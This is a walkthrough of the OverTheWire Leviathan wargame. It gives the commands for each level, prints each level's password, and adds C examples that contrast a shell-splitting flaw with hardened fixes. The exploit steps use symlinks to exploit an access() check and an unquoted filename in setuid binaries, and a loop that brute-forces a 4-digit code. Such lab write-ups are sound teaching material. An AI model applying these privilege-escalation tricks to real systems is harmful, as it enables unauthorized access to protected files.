Leviathan Writeup
Table of Contents
- Intro Reading
- This wargame doesn't require any knowledge about programming - just a bit of common sense and some knowledge about basic *nix commands. We had no idea that it'd be this hard to make an interesting wargame that wouldn't require programming abilities from the players.
Leviathan’s levels are called leviathan0, leviathan1, … etc. and can be accessed on leviathan.labs.overthewire.org through SSH on port 2223.
Data for the levels can be found in the home directories. You can look at /etc/leviathan_pass for the various level passwords.
To login to the first level:
Username: leviathan0
Password: leviathan0
- Level 0 -> Level 1
$ ssh leviathan0@leviathan.labs.overthewire.org -p 2223
$ ls -l /etc/leviathan_pass/
$ ls -la
$ cd .backup/
$ ls -la
$ cat bookmarks.html | grep password
To login to the next level:
Username: leviathan1
Password: rioGegei8m
- Level 1 -> Level 2
$ ssh leviathan1@leviathan.labs.overthewire.org -p 2223
$ ls -la
$ strings check
$ ltrace ./check
Enter a random password; in the ltrace output you'll notice the call strcmp("your_input\n", "sex").
$ ./check
Using "sex" as the password, you are now logged in as leviathan2 (run 'bash' if you want to switch to the usual bash prompt).
$ cat /etc/leviathan_pass/leviathan2
To login to the next level:
Username: leviathan2
Password: ougahZi8Ta
- Level 2 -> Level 3
$ ssh leviathan2@leviathan.labs.overthewire.org -p 2223
$ ls -la
Launch the ./printfile executable; you'll notice that the program outputs the text from a file. Let's create a tmp file and see what happens inside the program.
$ mkdir /tmp/test && cd /tmp/test && touch test.txt
$ ltrace ~/printfile /tmp/test/test.txt
As you can see, the access() function is called on the input file. access() checks permissions based on the real user ID instead of the effective user ID; this can be exploited since ./printfile is owned by the leviathan3 user. It is also noticeable that /bin/cat is called on the file to output its contents, and that the filename is handed over without quoting, so /bin/cat uses just the first part of a filename that contains a space. Let's add a space to the filename and see if /bin/cat reads the file as two separate files.
$ touch "space test.txt"
$ ltrace ~/printfile space\ test.txt
That was right: it's exploitable.
Let's create a symbolic link named after the first part of the filename and point it to /etc/leviathan_pass/leviathan3.
$ ln -s /etc/leviathan_pass/leviathan3 /tmp/test/space
$ ~/printfile space\ test.txt
To login to the next level:
Username: leviathan3
Password: Ahdiemoo1j
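The splitting seen in this level, as an added C example that is not part of the original writeup or of the printfile binary: pasting a name into a shell command line lets the shell break it at the space, while passing it as a single argv element does not. The function names and the DECOY/INTENDED file contents are constructed for the demo.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
/* Vulnerable pattern: the shell splits the pasted name on whitespace (stderr dropped). */
int cat_via_shell(const char *name, char *out, size_t len)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "/bin/cat %s 2>/dev/null", name);
    FILE *p = popen(cmd, "r");
    if (!p) return -1;
    size_t n = fread(out, 1, len - 1, p);
    out[n] = '\0';
    return pclose(p) < 0 ? -1 : (int)n;
}

/* Hardened: no shell involved; the name is exactly one argv element. */
int cat_via_exec(const char *name, char *out, size_t len)
{
    int fds[2];
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid == 0) {                       /* child: stdout -> pipe, then exec */
        dup2(fds[1], STDOUT_FILENO); close(fds[0]); close(fds[1]);
        execl("/bin/cat", "cat", "--", name, (char *)NULL);
        _exit(127);
    }
    close(fds[1]);
    ssize_t n = pid > 0 ? read(fds[0], out, len - 1) : -1;
    out[n > 0 ? n : 0] = '\0';
    close(fds[0]);
    if (pid > 0) waitpid(pid, NULL, 0);
    return (int)n;
}

/* Constructed files "space" (decoy) and "space test.txt" (intended); bit 0 = shell read decoy, bit 1 = exec read intended. */
int demo_split(void)
{
    char dir[] = "/tmp/splitXXXXXX", a[64] = "", b[64] = "";
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;
    FILE *f = fopen("space", "w"); fputs("DECOY", f); fclose(f);
    f = fopen("space test.txt", "w"); fputs("INTENDED", f); fclose(f);
    cat_via_shell("space test.txt", a, sizeof a);
    cat_via_exec("space test.txt", b, sizeof b);
    unlink("space"); unlink("space test.txt"); if (chdir("/") == 0) rmdir(dir);
    return (strcmp(a, "DECOY") == 0) | ((strcmp(b, "INTENDED") == 0) << 1);
}
int main(void) { printf("demo_split() = %d\n", demo_split()); return 0; }
```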
- Level 3 -> Level 4
$ ssh leviathan3@leviathan.labs.overthewire.org -p 2223
$ ls -la
Launch the ./level3 executable; you'll notice that the program asks for a password. Let's try the ltrace command and see if it works.
$ ltrace ./level3
# the password is compared to "snlprintf". Try to input it
$ ./level3
# password: snlprintf
$ whoami
# leviathan3
As you can see, a shell has appeared but we are still the leviathan3 user. Let's run the ./level3 executable again inside this shell.
$ ltrace ./level3
# again the password is compared to "snlprintf". Try to input it
$ ./level3
# password: snlprintf
$ whoami
# leviathan4
$ cat /etc/leviathan_pass/leviathan4
To login to the next level:
Username: leviathan4
Password: vuH0coox6m
- Level 4 -> Level 5
Exploring the folder tree and its files, we can see that there is a folder called .trash, inside which there's a file called ./bin. Run the executable and decode the binary to ASCII.
$ ssh leviathan4@leviathan.labs.overthewire.org -p 2223
$ ls -lah
$ cd .trash
$ ./bin
$ echo 01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010 | perl -lape '$_=pack"(B8)*",@F'
# if the number has no spaces
$ echo 0101010001101001011101000110100000110100011000110110111101101011011001010110100100001010 | perl -lpe '$_=pack"B*",$_'
To login to the next level:
Username: leviathan5
Password: Tith4cokei
- Level 5 -> Level 6
Running the executable ./leviathan5, we can notice that it seems to read the content of a file, /tmp/file.log, which we cannot modify. What we can do is try to create a symbolic link through which we can access the desired leviathan6 password file.
$ ssh leviathan5@leviathan.labs.overthewire.org -p 2223
$ ls -lah
$ ./leviathan5
# Cannot find /tmp/file.log
$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
$ ./leviathan5
To login to the next level:
Username: leviathan6
Password: UgaoFee4li
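An added C example, not code from the writeup or from the wargame binaries, of the fix for the access() check in Level 2 and the /tmp/file.log symlink in Level 5: open the file with the caller's own rights and refuse a symbolic link, instead of checking first and following links later. open_as_real_user and the temporary file names are hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` with the caller's own rights instead of asking access() first:
 * drop the effective UID to the real UID, let the kernel do the permission
 * check inside open(), refuse a symlink as the final component, then restore.
 * Returns an fd, or -1 with errno set (ELOOP means the name was a symlink). */
int open_as_real_user(const char *path)
{
    uid_t privileged = geteuid();
    struct stat st;
    if (seteuid(getuid()) != 0) return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    int saved = errno;
    if (seteuid(privileged) != 0) abort();   /* never continue in an unknown state */
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))) {
        close(fd);                           /* decide on the opened object itself */
        fd = -1;
        saved = EACCES;
    }
    errno = saved;
    return fd;
}

/* Constructed scenario: a regular file with a space in its name and a symlink
 * to it. Bit 0: the regular file opens. Bit 1: the symlink is refused (ELOOP). */
int demo_symlink(void)
{
    char dir[] = "/tmp/openXXXXXX", file[64], lnk[64];
    int result = 0, fd;
    if (!mkdtemp(dir)) return -1;
    snprintf(file, sizeof file, "%s/space test.txt", dir);
    snprintf(lnk, sizeof lnk, "%s/file.log", dir);
    fd = open(file, O_CREAT | O_WRONLY, 0600);
    if (fd < 0 || symlink(file, lnk) != 0) return -1;
    close(fd);
    if ((fd = open_as_real_user(file)) >= 0) { result |= 1; close(fd); }
    if (open_as_real_user(lnk) < 0 && errno == ELOOP) result |= 2;
    unlink(lnk); unlink(file); rmdir(dir);
    return result;
}

int main(void) { printf("demo_symlink() = %d\n", demo_symlink()); return 0; }
```

O_NOFOLLOW only covers the last path component; a helper that must not traverse attacker-writable directories such as /tmp also needs to control where the file lives.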
- Level 6 -> Level 7
Running the executable ./leviathan6, we can notice that it seems to accept a 4-digit code. Let's try to brute-force it.
$ ssh leviathan6@leviathan.labs.overthewire.org -p 2223
$ ls -lah
$ ./leviathan6 1234
# Wrong
$ for i in {0000..9999}; do echo $i; ./leviathan6 $i; done
The correct password is 7123. With the right 4 digits the executable launches a shell as the leviathan7 user; let's just read the password file.
$ cat /etc/leviathan_pass/leviathan7
To login to the next level:
Username: leviathan7
Password: ahy7MaeBo9
- Level 7
$ ssh leviathan7@leviathan.labs.overthewire.org -p 2223
$ ls -lah
$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious